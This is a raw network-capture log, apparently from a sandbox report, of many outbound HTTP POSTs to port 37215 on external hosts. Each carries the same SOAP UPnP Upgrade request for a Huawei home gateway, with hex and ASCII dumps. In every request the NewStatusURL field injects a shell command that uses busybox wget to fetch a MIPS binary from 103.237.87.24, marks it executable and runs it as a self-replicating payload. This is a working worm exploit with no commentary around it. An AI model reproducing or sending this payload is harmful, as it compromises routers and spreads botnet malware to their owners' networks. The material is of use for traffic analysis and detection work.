                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  534192.168.2.1360048124.2.76.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120749950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  535192.168.2.133830441.26.82.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120763063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  536192.168.2.135251841.241.194.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.120768070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  537192.168.2.1360604165.209.159.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121443033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  538192.168.2.1339264197.162.90.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121443033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  539192.168.2.135796241.243.39.18937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121488094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  540192.168.2.135222241.43.90.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121488094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  541192.168.2.1352376157.203.186.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121515989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  542192.168.2.1345154220.128.100.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121531963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  543192.168.2.1350940197.47.220.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.121531963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 